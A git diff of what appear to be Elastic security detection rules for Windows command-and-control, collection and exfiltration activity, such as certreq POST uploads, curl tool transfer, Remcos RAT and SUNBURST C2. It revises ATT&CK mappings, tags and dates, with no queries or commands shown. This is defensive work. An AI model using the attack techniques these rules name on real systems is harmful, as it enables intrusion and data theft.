"Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_posh_webcam_video_capture.toml b/rules/windows/collection_posh_webcam_video_capture.toml index 02a9ad1f14e..f50dd0f2e8e 100644 --- a/rules/windows/collection_posh_webcam_video_capture.toml +++ b/rules/windows/collection_posh_webcam_video_capture.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/18" integration = ["windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/26" [rule] author = ["Elastic"] @@ -93,7 +93,14 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Execution", "Data Source: PowerShell Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -117,34 +124,34 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1125" name = "Video Capture" reference = "https://attack.mitre.org/techniques/T1125/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/collection_winrar_encryption.toml b/rules/windows/collection_winrar_encryption.toml index ef15efa4aae..076a07172bb 100644 --- a/rules/windows/collection_winrar_encryption.toml +++ b/rules/windows/collection_winrar_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -110,6 +110,11 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -120,6 +125,7 @@ id = "T1560.001" name = "Archive via Utility" reference = "https://attack.mitre.org/techniques/T1560/001/" + [rule.threat.tactic] id = "TA0009" name = "Collection" diff --git a/rules/windows/command_and_control_certreq_postdata.toml b/rules/windows/command_and_control_certreq_postdata.toml index b1817697a24..d2af75605fd 100644 --- a/rules/windows/command_and_control_certreq_postdata.toml +++ b/rules/windows/command_and_control_certreq_postdata.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -108,7 +108,22 @@ references = ["https://lolbas-project.github.io/lolbas/Binaries/Certreq/"] risk_score = 47 rule_id = "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -120,26 +135,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/windows/command_and_control_common_webservices.toml b/rules/windows/command_and_control_common_webservices.toml index 32761193600..0c00e93c80e 100644 --- a/rules/windows/command_and_control_common_webservices.toml +++ b/rules/windows/command_and_control_common_webservices.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/12" [transform] [[transform.investigate]] @@ -339,13 +339,54 @@ network where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" +[[rule.threat.technique]] +id = "T1568" +name = "Dynamic Resolution" +reference = "https://attack.mitre.org/techniques/T1568/" +[[rule.threat.technique.subtechnique]] +id = "T1568.002" +name = "Domain Generation Algorithms" +reference = "https://attack.mitre.org/techniques/T1568/002/" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" +[[rule.threat.technique.subtechnique]] +id = "T1090.002" +name = "External Proxy" +reference = "https://attack.mitre.org/techniques/T1090/002/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" +[[rule.threat.technique.subtechnique]] +id = "T1567.001" +name = "Exfiltration to Code Repository" +reference = "https://attack.mitre.org/techniques/T1567/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1567.002" +name = "Exfiltration to Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1567/002/" + + + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml index 0b1bd471e05..7a9bf50f8f0 100644 --- a/rules/windows/command_and_control_encrypted_channel_freesslcert.toml +++ b/rules/windows/command_and_control_encrypted_channel_freesslcert.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -92,18 +92,14 @@ network where host.os.type == "windows" and network.protocol == "dns" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1573" name = "Encrypted Channel" reference = "https://attack.mitre.org/techniques/T1573/" -[[rule.threat.technique.subtechnique]] -id = "T1573.002" -name = "Asymmetric Cryptography" -reference = "https://attack.mitre.org/techniques/T1573/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/command_and_control_iexplore_via_com.toml b/rules/windows/command_and_control_iexplore_via_com.toml index be7fdce0a18..a9db0f9e470 100644 --- a/rules/windows/command_and_control_iexplore_via_com.toml +++ b/rules/windows/command_and_control_iexplore_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/28" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -20,7 +20,14 @@ name = "Potential Command and Control via Internet Explorer" risk_score = 47 rule_id = "acd611f3-2b93-47b3-a0a3-7723bcc46f6d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -82,59 +89,31 @@ Internet Explorer can be manipulated via the Component Object Model (COM) to ini [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml index 78cfe61c520..e584f93e7a1 100644 --- a/rules/windows/command_and_control_outlook_home_page.toml +++ b/rules/windows/command_and_control_outlook_home_page.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -64,7 +64,20 @@ references = [ risk_score = 73 rule_id = "ac5a2759-5c34-440a-b0c4-51fe674611d6" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -80,17 +93,25 @@ registry where host.os.type == "windows" and event.action != "deletion" and regi [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" - [[rule.threat.technique.subtechnique]] id = "T1137.004" name = "Outlook Home Page" reference = "https://attack.mitre.org/techniques/T1137/004/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml index faf4022a242..0e73d7b7ab7 100644 --- a/rules/windows/command_and_control_port_forwarding_added_registry.toml +++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -70,7 +70,20 @@ references = [ risk_score = 47 rule_id = "3535c8bb-3bd5-40f4-ae32-b7cd589d5372" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -82,18 +95,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" -[[rule.threat.technique.subtechnique]] -id = "T1090.001" -name = "Internal Proxy" -reference = "https://attack.mitre.org/techniques/T1090/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml index 4a2eba9d304..14e373d6b5f 100644 --- a/rules/windows/command_and_control_rdp_tunnel_plink.toml +++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/14" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -91,31 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] -id = "T1021.001" -name = "Remote Desktop Protocol" -reference = "https://attack.mitre.org/techniques/T1021/001/" +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/command_and_control_remcos_rat_iocs.toml b/rules/windows/command_and_control_remcos_rat_iocs.toml index 41cfecfa7e0..e7563a52d20 100644 --- a/rules/windows/command_and_control_remcos_rat_iocs.toml +++ b/rules/windows/command_and_control_remcos_rat_iocs.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/20" [rule] author = ["Elastic"] @@ -53,7 +53,19 @@ references = [ risk_score = 73 rule_id = "d8b2f85a-cf1c-40fc-acf0-bb5d588a8ea6" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs" +] timestamp_override = "event.ingested" type = "eql" @@ -79,31 +91,14 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.001" -name = "Registry Run Keys / Startup Folder" -reference = "https://attack.mitre.org/techniques/T1547/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml index d1f4a1a5e14..82f163f5d20 100644 --- a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml +++ b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.investigate]] @@ -144,7 +144,20 @@ references = ["https://labs.sentinelone.com/living-off-windows-land-a-new-native risk_score = 47 rule_id = "15c0b7a7-9c34-4869-b25b-fa6518414899" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Sysmon", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Sysmon", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -157,26 +170,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/command_and_control_remote_file_copy_powershell.toml b/rules/windows/command_and_control_remote_file_copy_powershell.toml index 97d01d5bcb5..a390d17502c 100644 --- a/rules/windows/command_and_control_remote_file_copy_powershell.toml +++ b/rules/windows/command_and_control_remote_file_copy_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -128,7 +128,7 @@ PowerShell is one of system administrators' main tools for automation, report ro risk_score = 47 rule_id = "33f306e8-417c-411b-965c-c2812d6d3f4d" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Defend"] type = "eql" query = ''' @@ -161,31 +161,31 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml index fca7770e374..9042a919ec0 100644 --- a/rules/windows/command_and_control_remote_file_copy_scripts.toml +++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -123,26 +123,31 @@ sequence by host.id, process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/command_and_control_screenconnect_childproc.toml b/rules/windows/command_and_control_screenconnect_childproc.toml index e23873dfce6..8ae791c89f0 100644 --- a/rules/windows/command_and_control_screenconnect_childproc.toml +++ b/rules/windows/command_and_control_screenconnect_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/27" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/05" [rule] author = ["Elastic"] @@ -65,7 +65,20 @@ references = [ risk_score = 47 rule_id = "78de1aeb-5225-4067-b8cc-f4a1de8a8546" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -94,26 +107,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml index 8431bd3c030..53c16e9ff6d 100644 --- a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml +++ b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -130,18 +130,36 @@ network where host.os.type == "windows" and event.type == "protocol" and network [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml index 63bb0f13837..3bb1e29bf23 100644 --- a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml +++ b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -124,7 +124,6 @@ file where host.os.type == "windows" and event.type == "creation" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" @@ -135,12 +134,9 @@ id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" -[[rule.threat.technique.subtechnique]] -id = "T1219.001" -name = "IDE Tunneling" -reference = "https://attack.mitre.org/techniques/T1219/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/command_and_control_tool_transfer_via_curl.toml b/rules/windows/command_and_control_tool_transfer_via_curl.toml index 0ee101aa41c..760413874e8 100644 --- a/rules/windows/command_and_control_tool_transfer_via_curl.toml +++ b/rules/windows/command_and_control_tool_transfer_via_curl.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/27" [rule] author = ["Elastic"] @@ -108,23 +108,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/command_and_control_tunnel_yuze.toml b/rules/windows/command_and_control_tunnel_yuze.toml index d7edec827c7..a3a6314cc2e 100644 --- a/rules/windows/command_and_control_tunnel_yuze.toml +++ b/rules/windows/command_and_control_tunnel_yuze.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/18" [rule] author = ["Elastic"] @@ -86,12 +86,6 @@ process where host.os.type == "windows" and event.type == "start" and 